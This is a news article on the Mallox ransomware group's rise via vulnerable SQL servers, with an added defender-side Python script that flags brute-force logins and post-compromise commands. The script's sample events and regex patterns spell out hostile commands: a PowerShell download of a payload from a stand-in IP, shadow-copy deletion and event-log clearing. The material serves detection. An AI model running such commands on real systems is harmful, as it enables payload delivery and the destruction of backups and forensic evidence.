Mallox Ransomware Group Activity Shifts Into High Gear

Published: 23/11/2024   Category: security




Malicious activity targeting vulnerable SQL servers has surged 174% compared to 2022, Palo Alto's Unit 42 says.



A ransomware actor with a penchant for breaking into target networks via vulnerable SQL servers has suddenly become very active over the past several months and appears poised to become an even bigger threat than it is already.
The group, tracked as Mallox — aka TargetCompany, Fargo, and Tohnichi — first surfaced in June 2021 and claims to have infected hundreds of organizations worldwide since then. The group's victims include organizations in the manufacturing, retail, wholesale, legal, and professional services sectors.
Starting earlier this year, threat activity related to the group has surged, particularly in May, according to researchers at Palo Alto Networks' Unit 42 threat intelligence team. Palo Alto's telemetry, and that from other open threat intelligence sources, show a startling 174% increase in Mallox-related activity so far this year compared to 2022, the security vendor said in a blog this week.
"Previously, Mallox was known for being a relatively small and closed ransomware group," says Lior Rochberger, senior security researcher at Palo Alto Networks, who attributes the explosive activity to concerted efforts by group leaders to grow Mallox operations.
"In the beginning of 2023, it appears that the group started putting more effort into expanding its operations by recruiting affiliates," she says. "This can potentially explain the surge we observed during this year, and especially more recently, around May."
The Mallox group's typical approach for gaining initial access to enterprise networks is to target vulnerable and otherwise insecure SQL servers. Often they start with a brute-force attack, in which the adversary tries a list of commonly used passwords or known default passwords against an organization's SQL servers.
Researchers have observed Mallox exploiting at least two remote code execution vulnerabilities in SQL — CVE-2020-0618 and CVE-2019-1068, Rochberger says.
So far, Unit 42 has only observed Mallox infiltrating networks via SQL servers. But other researchers have reported recent attempts to distribute Mallox via phishing emails, suggesting that new affiliate groups are involved now as well, Rochberger says.
After gaining access, the attackers use the command line and PowerShell to download the Mallox ransomware payload from a remote server, Unit 42's report this week noted.
As with many other ransomware infections these days, the payload first attempts to disable all services that would impede its ability to encrypt data on a victim system. It also tries to systematically delete shadow copies, so data restoration becomes harder once encryption is complete. In addition, the malware tries to clear all event logs using a common Microsoft command utility as part of an effort to complicate forensic analysis.
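As an added defender-side example (not code from the article or from Unit 42), the following Python triages constructed Windows and SQL Server event records for the two stages described above: a password brute force against SQL Server (Event ID 18456 failed logins) and the post-access behaviour of the payload (PowerShell download, shadow-copy deletion, event-log clearing) as seen in process-creation events (Event ID 4688). The command-line patterns, the failure threshold and the sample records are assumptions for illustration, not Mallox-specific indicators.

```python
import re
from collections import Counter

# Assumed threshold: failed logins from one source before it is flagged.
FAILED_LOGIN_THRESHOLD = 5

# Generic Windows command-line indicators for the behaviours described; these
# are assumptions for illustration, not a Mallox-specific signature.
SUSPICIOUS_CMDLINES = {
    "remote_payload_download": re.compile(
        r"powershell.*(downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b).*https?://", re.I),
    "shadow_copy_deletion": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "event_log_clearing": re.compile(r"wevtutil(\.exe)?\s+cl\b|clear-eventlog", re.I),
}

def detect_sql_bruteforce(events, threshold=FAILED_LOGIN_THRESHOLD):
    """Return {source: failure_count} for sources with >= threshold failed logins (18456)."""
    failures = Counter(src for eid, src, _ in events if eid == 18456)
    return {src: n for src, n in failures.items() if n >= threshold}

def classify_process_events(events):
    """Return (host, category, command_line) for 4688 events matching an indicator."""
    hits = []
    for eid, host, cmdline in events:
        if eid != 4688:
            continue
        for category, pattern in SUSPICIOUS_CMDLINES.items():
            if pattern.search(cmdline):
                hits.append((host, category, cmdline))
    return hits

# Constructed sample records (event_id, source_or_host, detail); not real telemetry.
SAMPLE_EVENTS = [
    *[(18456, "203.0.113.5", "Login failed for user 'sa'.") for _ in range(8)],
    (18456, "10.0.0.21", "Login failed for user 'reporting'."),
    (4688, "SQL01", r'powershell.exe -c "Invoke-WebRequest -Uri http://198.51.100.9/p.bin -OutFile C:\Windows\Temp\p.bin"'),
    (4688, "SQL01", "vssadmin.exe delete shadows /all /quiet"),
    (4688, "SQL01", "wevtutil.exe cl Security"),
    (4688, "SQL01", r"notepad.exe C:\Users\admin\notes.txt"),
]

if __name__ == "__main__":
    print("brute-force sources:", detect_sql_bruteforce(SAMPLE_EVENTS))
    for host, category, cmdline in classify_process_events(SAMPLE_EVENTS):
        print(f"{host}: {category}: {cmdline}")
```

In practice the same two checks would run over records exported from the SQL Server error log and the Security event log rather than the constructed list.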
Mallox is a double extortion campaign, meaning the threat actors steal data from a victim environment before encrypting it. The group — like almost every other ransomware operation these days — maintains a website where it leaks data belonging to victims who refuse to accede to its ransom demands. Victim organizations can negotiate with Mallox operators via a Tor website using a unique private key to authenticate themselves. Mallox operators themselves claim to have breached hundreds of organizations worldwide. Unit 42 said its own telemetry indicates at least dozens of potential victims worldwide.
Mallox's sudden burst of activity, while noteworthy, is unlikely to change anything for enterprise defenders or cause any new additional problems for them. A new report from the NCC Group this week showed a 221% increase in ransomware attacks this year over the same period in 2022. NCC Group said it counted a record 434 attacks in June 2023, most of them tied to the Cl0p ransomware group's exploitation of the MOVEit file transfer vulnerability. The Cl0p group in total accounted for 90 ransomware attacks that NCC observed in June. Lockbit 3.0 was another very active threat actor over the period, NCC Group said.
As always, the best defense against the threat is to have a multilayered plan in place for addressing such attacks. The Unit 42 team recommends making sure that all Internet-facing applications are configured properly, and that all systems are patched and up to date wherever possible, the security vendor advised. It's also a good idea to have endpoint security controls in place for performing in-memory inspection to detect process-injection attempts, lateral movement efforts, and attempts to evade security controls, the vendor said.
